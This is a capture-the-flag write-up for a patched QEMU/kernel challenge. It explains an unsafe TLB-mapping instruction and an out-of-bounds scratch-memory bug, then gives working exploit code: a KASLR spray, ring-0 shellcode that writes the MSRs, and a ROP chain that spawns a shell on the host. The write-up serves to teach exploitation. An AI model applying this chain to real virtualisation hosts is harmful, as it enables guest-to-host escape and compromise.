Tags: x86-64 pwn qemu kernel amd64
Rating:
author: 0x6fe1be2
Description:
You have the great pleasure of sampling our HXP HACK-4 AI1337 processor - an intersection of Security and AI.
Like it? We have many in the pipeline!-- sisu
The challenge consists of a modified QEMU binary which adds new instructions to the existing x86-64 set, notably MTS
(load bytes from scratch memory), STM
(store bytes to scratch memory) which are unprivileged and SCRHLW
(update scratch memory) which is privileged.
Additionally two MSR (Model Specific Registers) where added MSR_HACK4_SLICE_SIZE=0x400
and MSR_HACK4_NUM_SLICES=33
The privileged SCRHLW
instruction can be access through a patched in prctl
option PR_SET_SCRATCH_HOLE
inside the linux kernel and seems to directly update the TLB (Translation Lookaside Buffer) which we can exploit.
SCRHLW
to inject CPL0 shellcodeLets give a brief overview of the challenge components.
hxp_silicon_foundaries_hack4-7786be6f6ac42883.tar.xz
.
└── hxp_silicon_foundaries_hack4
├── Dockerfile
├── bzImage
├── compose.yml
├── example_program
│ ├── ai.s
│ ├── build.sh
│ └── main.c
├── flag.txt
├── hxp_ai1337.pdf
├── initramfs.cpio
├── launch_vm.sh
├── linux_build
│ └── 0001-Add-PR_SET_SCRATCH_HOLE.patch
├── pow-solver
├── pow-solver.cpp
├── qemu_build
│ ├── 0001-Add-hack4-ai1337.patch
│ ├── Dockerfile
│ └── build_package
│ ├── bios-256k.bin
│ ├── efi-e1000.rom
│ ├── kvmvapic.bin
│ ├── linuxboot_dma.bin
│ └── qemu_system_x86_64_ai1337
└── ynetd
The challenge creators where nice enough to give us basically all files necessary for deploying the challenges. This is going to be mostly interesting when exploiting the QEMU binary as this pretty similar to userland exploitation and knowing the correct libraries through the Dockerfile will be helpful.
We can also see that the flag is not inside the VM telling us that we will have to escape QEMU if we want to get it.
Now lets look at the more interesting files:
The kernel related files seem to be rather standard, we have a initramfs.cpio which contains our filesystems (Note: kernel challenges normally don't bother booting into a e.g. XFS rootfs and just stay inside the initramfs) and a kernel bzImage (which seems to be 6.12.1
).
We have also been give a kernel patch file, which seems to add a new prctl
option called PR_SET_SCRATCH_HOLE
and seems to execute a "new" assembly instruction SCRHLW
, which has been added through QEMU.
0001-Add-PR_SET_SCRATCH_HOLE.patch
Details
Even though the linux kernel doesn't seem to have a deliberate vulnerability it will be important, because we start out as a unprivileged user. Usually QEMU exploit require CPL0 (Ring 0) access, which we should keep in mind.
QEMU seems to be the focus of this challenge. We are given a patched binary qemu_system_x86_64_ai1337 and a patch file which we will have to analyse, because it's probably where the vulnerability will lie.
0001-Add-hack4-ai1337.patch
Details
Also luckily for use we have been given a assembly file that provides stubs for interacting with the custom instructions.
ai.s
Details
last but not least we have the command used for starting the VM. One important thing to notice is that neither smap
nor smep
are enabled allowing us to write a 2nd stage payload directly in userland and jumping to it, without requiring disabling them through CR4
first.
launch_vm.sh
Details
We have also been give some form of Device Specification in form of a .pdf (hxp_silicon_foundaries_hack4/hxp_ai1337.pdf) and .rst . Which seems to explain a number of Instructions/MSRs which have been added through QEMU and will be the target of our exploit:
Instructions:
Opcode | Instruction | Description |
---|---|---|
0F 0A 83 | MTS | Load RCX bytes from memory address (RSI) to slice (RBX) at slice offset (RDI) |
0F 0A 84 | STM | Read RCX bytes from slice (RBX) at slice offset (RDI) and write memory address (RSI) |
0F 0A 85 | FSCR | Clear all slices |
0F 0A 86 | SCRADD | Add the slices pointed by RDI and RSI, and store the result into slice pointed by RDX |
0F 0A 87 | SCRSUB | Subtract the slices pointed by RDI and RSI, and store the result into slice pointed by RDX |
0F 0A 88 | SCRMUL | Multiply the slices pointed by RDI and RSI, and store the result into slice pointed by RDX |
0F 0A 89 | SCRHLW (privileged) | Update scratch memory PSCHORR bi-ATS base VA |
0F 0A 8A | SCRHLR | Read scratch memory PSCHORR bi-ATS base VA |
MSRs:
MSR | Identifier | Description |
---|---|---|
MSR_HACK4_SLICE_SIZE | 0xC0000105 | Read/Write slice size in the AI1337 engine |
MSR_HACK4_NUM_SLICES | 0xC0000106 | Read/Write count of slices in the AI1337 engine |
We also receive multiple ASCII diagrams notably this one, which is going to be relevant for our exploit.
Physical Memory Virtual Memory
0 |
| |
IO space | |
| |
- |
| |
| |
| | Direct Addressing
RAM | | |
| ___________________________|_____ |
| / | | |
---/ | bi-ATS |------|
| | |
| _______________________|________|
AI1337 | /
aperture | / PSCHORR Interconnect
---
I'm using the following tools for writing and testing my exploit:
Lets start with writing our exploit:
As teased before there seem to be vulnerabilities in the implementation of the x86-64 extension called AI1337. Let's have a closer look at the patches
First some constants are defined which will be relevant for the patch.
target/i386/ops_ai1337.h
#define AI1337_SCRATCH_SIZE (33ULL * 1024)
#define AI1337_SCRATCH_MAX_NUM_SLICES (128)
#define AI1337_SCRATCH_SLICE_SIZE_DEFAULT (1024ULL)
#define AI1337_SCRATCH_NUM_SLICES_DEFAULT (33UL)
#define AI1337_SCRATCH_MAX_SLICE_SIZE (4096ULL)
Then we need to initialise our new variable directly in the CPU. Note that we use a stack array cratch[AI1337_SCRATCH_SIZE]
and use it for our scratch operations. It seems like this won't be able to hold AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE
(Foreshadowing).
target/i386/cpu.c
...
env->scratch_config.num_active_slices = AI1337_SCRATCH_NUM_SLICES_DEFAULT;
env->scratch_config.slice_size = AI1337_SCRATCH_SLICE_SIZE_DEFAULT;
env->scratch_config.va_base = AI1337_SCRATCH_VA_BASE;
env->scratch_config.phys_base = AI1337_SCRATCH_PHYS_BASE;
env->scratch_config.access_enabled = 0;
uint16_t scratch[AI1337_SCRATCH_SIZE];
env->scratch_region = malloc(sizeof(MemoryRegion));
memset(env->scratch_region, 0, sizeof(*env->scratch_region));
memory_region_init_ram_ptr(env->scratch_region, NULL, "ai1337-scratch", AI1337_SCRATCH_SIZE, scratch);
env->scratch_region->ram_block->flags |= RAM_RESIZEABLE;
env->scratch_region->ram_block->max_length = AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE;
memory_region_add_subregion(get_system_memory(), AI1337_SCRATCH_PHYS_BASE, env->scratch_region);
...
When we edit MSR we directly change the values inside our CPU config without reinitialising our scratch_region
which should lead to a OOB
. Sadly we are only able to edit MSR directly in CPL0 which isn't possible with a unprivileged user.
target/i386/tcg/sysemu/misc_helper.c
...
static bool helper_recalculate_scratch(CPUX86State *env, uint32_t new_num_slices, uint32_t new_slice_size)
{
if (new_num_slices > AI1337_SCRATCH_MAX_NUM_SLICES) {
return false;
}
if (new_slice_size > AI1337_SCRATCH_MAX_SLICE_SIZE) {
return false;
}
uint32_t new_size = new_num_slices * new_slice_size;
Error *err = NULL;
bql_lock();
memory_region_ram_resize(env->scratch_region, new_size, &err);
bql_unlock();
if (err) {
return false;
}
env->scratch_config.num_active_slices = new_num_slices;
env->scratch_config.slice_size = new_slice_size;
return true;
}
void helper_wrmsr(CPUX86State *env)
...
case MSR_HACK4_SLICE_SIZE:
const uint32_t new_slice_size = val;
if (!helper_recalculate_scratch(env, env->scratch_config.num_active_slices, new_slice_size)) {
goto error;
}
break;
case MSR_HACK4_NUM_SLICES:
const uint32_t new_num_active_slices = val;
if (!helper_recalculate_scratch(env, new_num_active_slices, env->scratch_config.slice_size)) {
goto error;
}
break;
...
void helper_rdmsr(CPUX86State *env)
...
case MSR_HACK4_SLICE_SIZE:
val = env->scratch_config.slice_size;
break;
case MSR_HACK4_NUM_SLICES:
val = env->scratch_config.num_active_slices;
break;
...
And yeah it looks like we have a OOB when writing or reading from the scratch_region
after editing the MSR.
target/i386/tcg/translate.c
...
static void gen_mts_8(DisasContext *s, MemOp ot)
{
const size_t slice_size_offset = offsetof(CPUX86State, scratch_config.slice_size);
const size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
const size_t access_offset = offsetof(CPUX86State, scratch_config.access_enabled);
const TCGv slice_index = cpu_regs[R_EBX];
const TCGv offset_in_slice = cpu_regs[R_EDI];
const TCGv memory_address = cpu_regs[R_ESI];
const TCGv dshift = gen_compute_Dshift(s, ot);
tcg_gen_st_tl(tcg_constant_i64(1), tcg_env, access_offset);
// load from memory address
gen_lea_v_seg(s, memory_address, R_DS, -1);
gen_op_ld_v(s, MO_8, s->T0, s->A0);
// Calculate address for scratch
// A0 = offset_in_slice + slice_base + (slice_index * slice_size)
tcg_gen_ld_tl(s->A0, tcg_env, va_base_offset);
gen_lea_v_seg(s, s->A0, R_ES, -1);
tcg_gen_add_tl(s->A0, s->A0, offset_in_slice);
tcg_gen_ld32u_tl(s->tmp0, tcg_env, slice_size_offset);
tcg_gen_mul_tl(s->tmp0, s->tmp0, slice_index);
tcg_gen_add_tl(s->A0, s->A0, s->tmp0);
// Store value
gen_op_st_v(s, MO_8, s->T0, s->A0);
gen_op_add_reg(s, s->aflag, R_ESI, dshift);
gen_op_add_reg(s, s->aflag, R_EDI, dshift);
tcg_gen_st_tl(tcg_constant_i64(0), tcg_env, access_offset);
}
static void gen_stm_8(DisasContext *s, MemOp ot)
{
...
// similar to gen_mts_8
...
}
Finally let's have a look at the inner workings of SCRHLW
.
target/i386/tcg/emit.c.inc
static void gen_SCRHLW(DisasContext *s, X86DecodedInsn *decode)
{
if (CPL(s) != 0)
{
gen_illegal_opcode(s);
return;
}
size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
tcg_gen_st_tl(cpu_regs[R_EDI], tcg_env, va_base_offset);
}
And we notice that this seems to unsafely update the TLB, which we can exploit. This seems to implement the functionally described in the diagram before notably our scratch_region
is made directly accessible through virtual memory using the TLB.
target/i386/tcg/sysemu/excp_helper.c
...
bool x86_cpu_tlb_fill(CPUState *cs, vaddr addr, int size,
MMUAccessType access_type, int mmu_idx,
bool probe, uintptr_t retaddr)
...
if (env->scratch_config.access_enabled &&
(addr >= env->scratch_config.va_base) &&
((addr + size) <= (env->scratch_config.va_base + x86_calculate_scratch_size(env)))) {
vaddr paddr = env->scratch_config.phys_base + (addr - env->scratch_config.va_base);
tlb_set_page_with_attrs(cs, addr & TARGET_PAGE_MASK,
paddr & TARGET_PAGE_MASK,
cpu_get_mem_attrs(env),
PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE);
return true;
}
...
Sadly SCRHLW
is only accessible when in CPL0, but luckily for us they patched the kernel to give us access through prctl
include/uapi/linux/prctl.h
...
#define PR_SET_SCRATCH_HOLE 0x53534352
...
kernel/sys.c
static noinstr int prctl_set_scratch_hole(unsigned long opt, unsigned long addr,
unsigned long size, unsigned long arg)
{
const u64 new_scratch_hole = opt;
if ((new_scratch_hole & 0xFFFUL) != 0U) {
return -EINVAL;
}
if (new_scratch_hole < mmap_min_addr) {
return -EINVAL;
}
asm volatile(
"mov %0, %%rdi\n\t"
".byte 0x0f; .byte 0x0a; .byte 0x89\n\t" // scrhlw
:
: "r"(new_scratch_hole)
: "rdi", "memory"
);
return 0;
}
...
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
...
case PR_SET_SCRATCH_HOLE:
error = prctl_set_scratch_hole(arg2, arg3, arg4, arg5);
break;
...
so how do we exploit a unsafe TLB update? Well basically this allows us to corrupt and virtual memory mapping we want (even CPL0 ones) as long as there is no existing TLB entry (this is an important consideration).
Also luckily for us KASLR is notoriously bad and only 16bit (kaslr.c), which is realistically brute-forcible with a non crashing spray, which we have.
So yeah we create a simple PoC script that sprays NOP
s (0x90
) and see if we create a segfault inside the kernel.
#define START_SEARCH 0xffffffff80000000
#define END_SEARCH 0xfffffffffff00000
int main(int argc, char *argv[]) {
lstage("INIT");
// cyclic_cpy(spray, 0x1000);
rlimit_increase(RLIMIT_NOFILE);
pin_cpu(0, 0);
// Gather info about scratch memory
scratch_info info = {0};
get_scratch_info(&info);
linfo("Scratch info:");
linfo(" - scratch addr: 0x%lx", info.scratch_addr);
linfo(" - scratch default size: 0x%lx bytes", info.scratch_default_size);
linfo(" - scratch max slice size: 0x%x bytes", info.scratch_max_slice_size);
linfo(" - scratch max slice count: %u", info.scratch_max_slice_count);
linfo("PSCHORR bi-ATS base VA: %p", read_ats_base());
lstage("START");
size_t slice_size_value = 0x400;
size_t *trampolin = (size_t*) 0x6fe1be2000;
char package[0x8000];
memset(package, 0x90, sizeof(package)); // spary int3
memcpy(&package[sizeof(package) - sizeof(pivot)], pivot, sizeof(pivot));
SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
for (size_t i = 0; i < sizeof(package) / 0x400; i++) {
load_scratch(i, 0, &package[i * slice_size_value], slice_size_value);
}
pid_t pid = fork();
if (pid == 0) {
linfo("crash and corrupt CPL0 TLB: %p", payload);
load_scratch(-1, 0, "X", 1); // segfault
}
wait(NULL); // clear TLB allowing injection
linfo("spray kaslr");
for (trampolin = (size_t*) (START_SEARCH);
trampolin < END_SEARCH; trampolin += 0x100000 / sizeof(size_t)) {
// linfo("spray aslr: %p", trampolin);
SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
if (((size_t) trampolin & 0xfffffff) == 0)
linfo("spray aslr: %p", trampolin);
// flush TLB
pid_t pid = fork();
if (pid == 0)
load_scratch(-1, 0, "X", 1);
wait(NULL);
}
putchar('\n');
lstage("END");
}
And luckily we get the following, which indicates that our NOP
-Sled spray worked and we tried to execute some invalid NULL Bytes afterwards.
[ 3.646252] Call Trace:
[ 3.646354] <TASK>
[ 3.655379] Oops: general protection fault, probably for non-canonical address 0x257830203a731fb1: 0000 [#23] PREEMPT SMP NOPTI
[ 3.655877] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[ 3.656141] RIP: 0010:0xffffffff81008000
[ 3.656332] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 <00> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3.657072] RSP: 0018:ffffc90000114800 EFLAGS: 00010007
[ 3.657284] RAX: 257830203a731fb1 RBX: 48c35b02760100c5 RCX: 0000000000000000
[ 3.657546] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 48c35b02760100c5
[ 3.657791] RBP: ffffc900001149c8 R08: ffffffff81c95968 R09: 00000000ffffefff
[ 3.658058] R10: ffffffff81c25980 R11: ffffffff81c7d980 R12: 48c35b02760100c5
[ 3.658323] R13: ffffc90000114900 R14: ffffc900001149c8 R15: ffffffff81ac882d
[ 3.658584] FS: 000000000040c878(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 3.658871] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.659078] CR2: 257830203a731fb1 CR3: 00000000028b4000 CR4: 00000000000006b0
[ 3.659330] Call Trace:
[ 3.659457] <TASK>
[ 3.668313] Oops: general protection fault, probably for non-canonical address 0x257830203a732031: 0000 [#24] PREEMPT SMP NOPTI
[ 3.668793] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[ 3.669052] RIP: 0010:0xffffffff81008000
So next we need to create some CPL0 Shellcode.
Let's start out simple and just overwrite the MSRs with the respective max values and to our luck it works.
crpt_msr.S
; nasm -f bin ./crpt_msr.S && xxd -i crpt_msr > crpt_msr.h
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106
BITS 64
xor rdx, rdx
mov rax, 0x1000
mov ecx, MSR_HACK4_SLICE_SIZE
wrmsr
mov rax, 128
mov ecx, MSR_HACK4_NUM_SLICES
wrmsr
int3
crpt_msr.h
unsigned char crpt_msr[] = {
0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xcc
};
unsigned int crpt_msr_len = 28;
...
char package[0x8000];
memset(package, 0x90, sizeof(package));
memcpy(&package[sizeof(package) - sizeof(crpt_msr)], pivot, sizeof(crpt_msr));
...
Now we need to somehow continue our exploit. As mentioned before neither smap
nor smep
are enabled allowing us to directly jump back into userspace so let's do that.
pivot.S
; nasm -f bin ./pivot.S && xxd -i pivot > pivot.h
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106
BITS 64
xor rdx, rdx
mov rax, 0x1000
mov ecx, MSR_HACK4_SLICE_SIZE
wrmsr
mov rax, 128
mov ecx, MSR_HACK4_NUM_SLICES
wrmsr
scasb
mov r15, 0x1111111111111111
call r15
pivot.h
unsigned char pivot[] = {
0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
0xc0, 0x0f, 0x30, 0xae, 0x49, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11,
0x11, 0x11, 0x41, 0xff, 0xd7
};
unsigned int pivot_len = 41;
...
void payload() {
asm("int3");
}
...
size_t* p = memmem(pivot, sizeof(pivot), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
if (p != NULL)
*p = (size_t) &payload;
...
AND IT WORKS!
After corrupting the MSRs to achieve OOB we can simply get memory leaks inside QEMU and then use that information to drop a shell and read the flag.
#define BOF_IDX 16
#define BOF_OFFSET 0x800
void payload() {
char leak[0x400];
read_scratch(BOF_IDX, BOF_OFFSET, leak, sizeof(leak));
size_t offset = 0x3d8;
size_t libc = *(size_t*)&leak[0x378] - 0x11b9e1;
load_scratch(0, 0, &me, 8);
load_scratch(0, 8, &libc, 8);
size_t bof_size = sizeof(leak) - offset;
char* bof = leak + offset;
bzero(bof, bof_size);
((size_t*)bof)[0] = libc + 0x10f75b+1; // ret
((size_t*)bof)[1] = libc + 0x10f75b; // pop rdi; ret
((size_t*)bof)[2] = libc + 0x1cb42f; // "/bin/sh"
((size_t*)bof)[3] = libc + 0x58740; // system
load_scratch(BOF_IDX, BOF_OFFSET + offset, bof, bof_size);
for(;;);
}
pwn.c
Details
FLAG: hxp{tH1s_1s_th3_AI_$$$s3Ri3$$$_n0t_tH3_s3CuR3_s3R1eS}